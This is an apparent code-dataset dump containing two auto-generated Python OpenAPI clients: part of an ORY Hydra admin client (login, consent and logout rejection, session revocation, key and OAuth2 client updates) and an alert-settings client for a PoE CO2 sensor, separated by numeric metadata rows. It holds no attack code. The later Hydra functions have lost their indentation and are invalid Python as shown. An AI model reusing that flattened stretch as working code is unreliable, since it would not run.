        async_req (bool): execute the request asynchronously.

    Returns:
        CompletedRequest, or the request thread when called
        asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['consent_challenge'] = consent_challenge
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PUT /oauth2/auth/requests/consent/reject;
# challenge goes in the query string, the RejectRequest in the body.
self.reject_consent_request = Endpoint(
    settings={
        'response_type': (CompletedRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/consent/reject',
        'operation_id': 'reject_consent_request',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': ['consent_challenge', 'body'],
        'required': ['consent_challenge'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'consent_challenge': (str,),
            'body': (RejectRequest,),
        },
        'attribute_map': {
            'consent_challenge': 'consent_challenge',
        },
        'location_map': {
            'consent_challenge': 'query',
            'body': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__reject_consent_request
)
def __reject_login_request(self, login_challenge, **kwargs):
    """Reject a Login Request  # noqa: E501

    When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider (sometimes called \"identity provider\") to authenticate the subject and then tell ORY Hydra now about it. The login provider is an web-app you write and host, and it must be able to authenticate (\"show the subject a login screen\") a subject (in OAuth2 the proper name for subject is \"resource owner\"). The authentication challenge is appended to the login provider URL to which the subject's user-agent (browser) is redirected to. The login provider uses that challenge to fetch information on the OAuth2 request and then accept or reject the requested authentication process. This endpoint tells ORY Hydra that the subject has not authenticated and includes a reason why the authentication was be denied. The response contains a redirect URL which the login provider should redirect the user-agent to.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.reject_login_request(login_challenge, async_req=True)
    >>> result = thread.get()

    Args:
        login_challenge (str):

    Keyword Args:
        body (RejectRequest): [optional]
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        CompletedRequest, or the request thread when called
        asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['login_challenge'] = login_challenge
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PUT /oauth2/auth/requests/login/reject;
# challenge goes in the query string, the RejectRequest in the body.
self.reject_login_request = Endpoint(
    settings={
        'response_type': (CompletedRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/login/reject',
        'operation_id': 'reject_login_request',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': ['login_challenge', 'body'],
        'required': ['login_challenge'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'login_challenge': (str,),
            'body': (RejectRequest,),
        },
        'attribute_map': {
            'login_challenge': 'login_challenge',
        },
        'location_map': {
            'login_challenge': 'query',
            'body': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__reject_login_request
)
def __reject_logout_request(self, logout_challenge, **kwargs):
    """Reject a Logout Request  # noqa: E501

    When a user or an application requests ORY Hydra to log out a user, this endpoint is used to deny that logout request. No body is required. The response is empty as the logout provider has to chose what action to perform next.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.reject_logout_request(logout_challenge, async_req=True)
    >>> result = thread.get()

    Args:
        logout_challenge (str):

    Keyword Args:
        body (RejectRequest): [optional]
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['logout_challenge'] = logout_challenge
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PUT /oauth2/auth/requests/logout/reject.
self.reject_logout_request = Endpoint(
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/logout/reject',
        'operation_id': 'reject_logout_request',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': ['logout_challenge', 'body'],
        'required': ['logout_challenge'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'logout_challenge': (str,),
            'body': (RejectRequest,),
        },
        'attribute_map': {
            'logout_challenge': 'logout_challenge',
        },
        'location_map': {
            'logout_challenge': 'query',
            'body': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [
            'application/json',
            'application/x-www-form-urlencoded'
        ],
    },
    api_client=api_client,
    callable=__reject_logout_request
)
def __revoke_authentication_session(self, subject, **kwargs):
    """Invalidates All Login Sessions of a Certain User Invalidates a Subject's Authentication Session  # noqa: E501

    This endpoint invalidates a subject's authentication session. After revoking the authentication session, the subject has to re-authenticate at ORY Hydra. This endpoint does not invalidate any tokens and does not work with OpenID Connect Front- or Back-channel logout.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.revoke_authentication_session(subject, async_req=True)
    >>> result = thread.get()

    Args:
        subject (str):

    Keyword Args:
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['subject'] = subject
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for DELETE /oauth2/auth/sessions/login.
self.revoke_authentication_session = Endpoint(
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/oauth2/auth/sessions/login',
        'operation_id': 'revoke_authentication_session',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': ['subject'],
        'required': ['subject'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'subject': (str,),
        },
        'attribute_map': {
            'subject': 'subject',
        },
        'location_map': {
            'subject': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__revoke_authentication_session
)
def __revoke_consent_sessions(self, subject, **kwargs):
    """Revokes Consent Sessions of a Subject for a Specific OAuth 2.0 Client  # noqa: E501

    This endpoint revokes a subject's granted consent sessions for a specific OAuth 2.0 Client and invalidates all associated OAuth 2.0 Access Tokens.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.revoke_consent_sessions(subject, async_req=True)
    >>> result = thread.get()

    Args:
        subject (str): The subject (Subject) who's consent sessions
            should be deleted.

    Keyword Args:
        client (str): If set, deletes only those consent sessions by the
            Subject that have been granted to the specified OAuth 2.0
            Client ID. [optional]
        all (bool): If set to `?all=true`, deletes all consent sessions
            by the Subject that have been granted. [optional]
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['subject'] = subject
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for DELETE /oauth2/auth/sessions/consent; all
# three parameters travel in the query string.
self.revoke_consent_sessions = Endpoint(
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/oauth2/auth/sessions/consent',
        'operation_id': 'revoke_consent_sessions',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': ['subject', 'client', 'all'],
        'required': ['subject'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'subject': (str,),
            'client': (str,),
            'all': (bool,),
        },
        'attribute_map': {
            'subject': 'subject',
            'client': 'client',
            'all': 'all',
        },
        'location_map': {
            'subject': 'query',
            'client': 'query',
            'all': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__revoke_consent_sessions
)
# NOTE: the 'set' parameter shadows the builtin, but it is part of the
# generated public interface and cannot be renamed.
def __update_json_web_key(self, kid, set, **kwargs):
    """Update a JSON Web Key  # noqa: E501

    Use this method if you do not want to let Hydra generate the JWKs for you, but instead save your own. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.update_json_web_key(kid, set, async_req=True)
    >>> result = thread.get()

    Args:
        kid (str): The kid of the desired key
        set (str): The set

    Keyword Args:
        body (JSONWebKey): [optional]
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        JSONWebKey, or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['kid'] = kid
    kwargs['set'] = set
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for PUT /keys/{set}/{kid}; kid and set are path
# parameters, the JSONWebKey travels in the body.
self.update_json_web_key = Endpoint(
    settings={
        'response_type': (JSONWebKey,),
        'auth': [],
        'endpoint_path': '/keys/{set}/{kid}',
        'operation_id': 'update_json_web_key',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': ['kid', 'set', 'body'],
        'required': ['kid', 'set'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'kid': (str,),
            'set': (str,),
            'body': (JSONWebKey,),
        },
        'attribute_map': {
            'kid': 'kid',
            'set': 'set',
        },
        'location_map': {
            'kid': 'path',
            'set': 'path',
            'body': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__update_json_web_key
)
def __update_json_web_key_set(
self,
set,
**kwargs
):
"""Update a JSON Web Key Set # noqa: E501
Use this method if you do not want to let Hydra generate the JWKs for you, but instead save your own. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_json_web_key_set(set, async_req=True)
>>> result = thread.get()
Args:
set (str): The set
Keyword Args:
body (JSONWebKeySet): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JSONWebKeySet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.update_json_web_key_set = Endpoint(
settings={
'response_type': (JSONWebKeySet,),
'auth': [],
'endpoint_path': '/keys/{set}',
'operation_id': 'update_json_web_key_set',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'set',
'body',
],
'required': [
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'set':
(str,),
'body':
(JSONWebKeySet,),
},
'attribute_map': {
'set': 'set',
},
'location_map': {
'set': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__update_json_web_key_set
)
def __update_o_auth2_client(
self,
id,
body,
**kwargs
):
"""Update an OAuth 2.0 Client # noqa: E501
Update an existing OAuth 2.0 Client. If you pass `client_secret` the secret will be updated and returned via the API. This is the only time you will be able to retrieve the client secret, so write it down and keep it safe. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_o_auth2_client(id, body, async_req=True)
>>> result = thread.get()
Args:
id (str):
body (OAuth2Client):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OAuth2Client
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.update_o_auth2_client = Endpoint(
settings={
'response_type': (OAuth2Client,),
'auth': [],
'endpoint_path': '/clients/{id}',
'operation_id': 'update_o_auth2_client',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'body',
],
'required': [
'id',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'body':
(OAuth2Client,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__update_o_auth2_client
)
| 40.568681
| 1,340
| 0.489835
| 13,882
| 147,670
| 5.003602
| 0.038107
| 0.027987
| 0.022459
| 0.023323
| 0.896948
| 0.881644
| 0.866484
| 0.853743
| 0.842816
| 0.832206
| 0
| 0.005427
| 0.433527
| 147,670
| 3,639
| 1,341
| 40.57983
| 0.824927
| 0.403833
| 0
| 0.679934
| 1
| 0
| 0.215424
| 0.036073
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012852
| false
| 0
| 0.008706
| 0
| 0.034411
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b111b6ee6ef9fd786033c08cd7b060b0cb6b6b24
| 21,361
|
py
|
Python
|
ct-ep100/v1.0.x/ja/autogen-openapi-generator/python/ct_ep100_client/api/alert_api.py
|
y2kblog/poe-webapi-sensor-api
|
7c21c88e4a7f74f7bc09c5d4dfc9ff352a98d458
|
[
"MIT"
] | null | null | null |
ct-ep100/v1.0.x/ja/autogen-openapi-generator/python/ct_ep100_client/api/alert_api.py
|
y2kblog/poe-webapi-sensor-api
|
7c21c88e4a7f74f7bc09c5d4dfc9ff352a98d458
|
[
"MIT"
] | null | null | null |
ct-ep100/v1.0.x/ja/autogen-openapi-generator/python/ct_ep100_client/api/alert_api.py
|
y2kblog/poe-webapi-sensor-api
|
7c21c88e4a7f74f7bc09c5d4dfc9ff352a98d458
|
[
"MIT"
] | null | null | null |
"""
PoE対応 WebAPI CO2センサ API仕様
\"Try it out\"機能は、API仕様を製品と同一ネットワーク上のローカルPCにダウンロードしブラウザで開くことで利用できます。 # noqa: E501
The version of the OpenAPI document: 1.0.x
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ct_ep100_client.api_client import ApiClient, Endpoint as _Endpoint
from ct_ep100_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from ct_ep100_client.model.alert import Alert
from ct_ep100_client.model.error import Error
from ct_ep100_client.model.inline_response200 import InlineResponse200
class AlertApi(object):
    """NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """

    def __init__(self, api_client=None):
        """Create the alert API facade.

        Args:
            api_client (ApiClient): client used to issue HTTP requests.
                A default ApiClient is created when None is given.
        """
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

        def _apply_request_defaults(kwargs):
            # Every endpoint closure below shares the same per-request
            # option defaults; fill in any the caller did not supply
            # (setdefault leaves caller-provided values untouched).
            kwargs.setdefault('async_req', False)
            kwargs.setdefault('_return_http_data_only', True)
            kwargs.setdefault('_preload_content', True)
            kwargs.setdefault('_request_timeout', None)
            kwargs.setdefault('_check_input_type', True)
            kwargs.setdefault('_check_return_type', True)
            kwargs.setdefault('_host_index', None)

        def __add_alert_setting(self, **kwargs):
            """Register one alert setting.

            Registers a setting for the alert feature, which sends a
            Webhook notification or saves CSV data to an FTP server when
            the specified condition is met.  Alert settings are kept even
            when the device is powered off; they are erased by deleting
            them or by resetting the device.  Up to 5 alert settings can
            be stored.  The same operation is available by opening
            /alerts.html in a browser.  The notification payload format is
            described under the "Callbacks" tab of the API document.

            Synchronous by default; pass async_req=True for an
            asynchronous request:

            >>> thread = api.add_alert_setting(async_req=True)
            >>> result = thread.get()

            Keyword Args:
                alert (Alert): [optional]
                async_req (bool): execute request asynchronously.
                    Default is False.
                _return_http_data_only (bool): return only the response
                    data, without status code and headers. Default True.
                _preload_content (bool): if False, the urllib3.HTTPResponse
                    object is returned without reading/decoding response
                    data. Default True.
                _request_timeout (float/tuple): total request timeout, or
                    a (connection, read) timeout pair. Default None.
                _check_input_type (bool): type-check data sent to the
                    server. Default True.
                _check_return_type (bool): type-check data received from
                    the server. Default True.
                _host_index (int/None): index of the server to use.
                    Default is read from the configuration.

            Returns:
                Alert, or the request thread when the call is
                asynchronous.
            """
            _apply_request_defaults(kwargs)
            return self.call_with_http_info(**kwargs)
        self.add_alert_setting = _Endpoint(
            settings={
                'response_type': (Alert,),
                'auth': ['basicAuth'],
                'endpoint_path': '/alerts',
                'operation_id': 'add_alert_setting',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': ['alert'],
                'required': [],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {'alert': (Alert,)},
                'attribute_map': {},
                'location_map': {'alert': 'body'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': ['application/json'],
            },
            api_client=api_client,
            callable=__add_alert_setting
        )

        def __alerts_alert_id_delete(self, alert_id, **kwargs):
            """Delete the alert setting with the given id.

            Synchronous by default; pass async_req=True for an
            asynchronous request:

            >>> thread = api.alerts_alert_id_delete(alert_id, async_req=True)
            >>> result = thread.get()

            Args:
                alert_id (int): ID of the alert setting to delete.

            Keyword Args:
                async_req (bool): execute request asynchronously.
                    Default is False.
                (plus the shared request options: _return_http_data_only,
                _preload_content, _request_timeout, _check_input_type,
                _check_return_type, _host_index — see add_alert_setting.)

            Returns:
                None, or the request thread when the call is asynchronous.
            """
            _apply_request_defaults(kwargs)
            kwargs['alert_id'] = alert_id
            return self.call_with_http_info(**kwargs)
        self.alerts_alert_id_delete = _Endpoint(
            settings={
                'response_type': None,
                'auth': ['basicAuth'],
                'endpoint_path': '/alerts/{alertId}',
                'operation_id': 'alerts_alert_id_delete',
                'http_method': 'DELETE',
                'servers': None,
            },
            params_map={
                'all': ['alert_id'],
                'required': ['alert_id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {'alert_id': (int,)},
                'attribute_map': {'alert_id': 'alertId'},
                'location_map': {'alert_id': 'path'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
            callable=__alerts_alert_id_delete
        )

        def __alerts_delete(self, **kwargs):
            """Delete all registered alert settings.

            The same operation is available by opening /alerts.html in a
            browser.

            Synchronous by default; pass async_req=True for an
            asynchronous request:

            >>> thread = api.alerts_delete(async_req=True)
            >>> result = thread.get()

            Keyword Args:
                async_req (bool): execute request asynchronously.
                    Default is False.
                (plus the shared request options: _return_http_data_only,
                _preload_content, _request_timeout, _check_input_type,
                _check_return_type, _host_index — see add_alert_setting.)

            Returns:
                None, or the request thread when the call is asynchronous.
            """
            _apply_request_defaults(kwargs)
            return self.call_with_http_info(**kwargs)
        self.alerts_delete = _Endpoint(
            settings={
                'response_type': None,
                'auth': ['basicAuth'],
                'endpoint_path': '/alerts',
                'operation_id': 'alerts_delete',
                'http_method': 'DELETE',
                'servers': None,
            },
            params_map={
                'all': [],
                'required': [],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {},
                'attribute_map': {},
                'location_map': {},
                'collection_format_map': {},
            },
            headers_map={
                'accept': [],
                'content_type': [],
            },
            api_client=api_client,
            callable=__alerts_delete
        )

        def __get_alert_by_id(self, alert_id, **kwargs):
            """Get the alert setting with the given id.

            Synchronous by default; pass async_req=True for an
            asynchronous request:

            >>> thread = api.get_alert_by_id(alert_id, async_req=True)
            >>> result = thread.get()

            Args:
                alert_id (int): ID of the alert setting to fetch.

            Keyword Args:
                async_req (bool): execute request asynchronously.
                    Default is False.
                (plus the shared request options: _return_http_data_only,
                _preload_content, _request_timeout, _check_input_type,
                _check_return_type, _host_index — see add_alert_setting.)

            Returns:
                Alert, or the request thread when the call is
                asynchronous.
            """
            _apply_request_defaults(kwargs)
            kwargs['alert_id'] = alert_id
            return self.call_with_http_info(**kwargs)
        self.get_alert_by_id = _Endpoint(
            settings={
                'response_type': (Alert,),
                'auth': ['basicAuth'],
                'endpoint_path': '/alerts/{alertId}',
                'operation_id': 'get_alert_by_id',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': ['alert_id'],
                'required': ['alert_id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {'alert_id': (int,)},
                'attribute_map': {'alert_id': 'alertId'},
                'location_map': {'alert_id': 'path'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
            callable=__get_alert_by_id
        )

        def __get_alerts(self, **kwargs):
            """Get the list of registered alert settings.

            Synchronous by default; pass async_req=True for an
            asynchronous request:

            >>> thread = api.get_alerts(async_req=True)
            >>> result = thread.get()

            Keyword Args:
                async_req (bool): execute request asynchronously.
                    Default is False.
                (plus the shared request options: _return_http_data_only,
                _preload_content, _request_timeout, _check_input_type,
                _check_return_type, _host_index — see add_alert_setting.)

            Returns:
                InlineResponse200, or the request thread when the call is
                asynchronous.
            """
            _apply_request_defaults(kwargs)
            return self.call_with_http_info(**kwargs)
        self.get_alerts = _Endpoint(
            settings={
                'response_type': (InlineResponse200,),
                'auth': ['basicAuth'],
                'endpoint_path': '/alerts',
                'operation_id': 'get_alerts',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [],
                'required': [],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {},
                'attribute_map': {},
                'location_map': {},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
            callable=__get_alerts
        )
| 35.424544
| 236
| 0.466223
| 1,835
| 21,361
| 5.162943
| 0.109537
| 0.033249
| 0.027444
| 0.028499
| 0.843466
| 0.831433
| 0.828478
| 0.821723
| 0.805995
| 0.799451
| 0
| 0.006601
| 0.453911
| 21,361
| 602
| 237
| 35.483389
| 0.805487
| 0.351154
| 0
| 0.642674
| 1
| 0
| 0.207893
| 0.029077
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015424
| false
| 0
| 0.017995
| 0
| 0.048843
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b16bbc49cf690f47fda4c9eee7bb1db3601c4254
| 107,000
|
py
|
Python
|
BIRi_Cloner/Biri-Clone.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
BIRi_Cloner/Biri-Clone.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
BIRi_Cloner/Biri-Clone.py
|
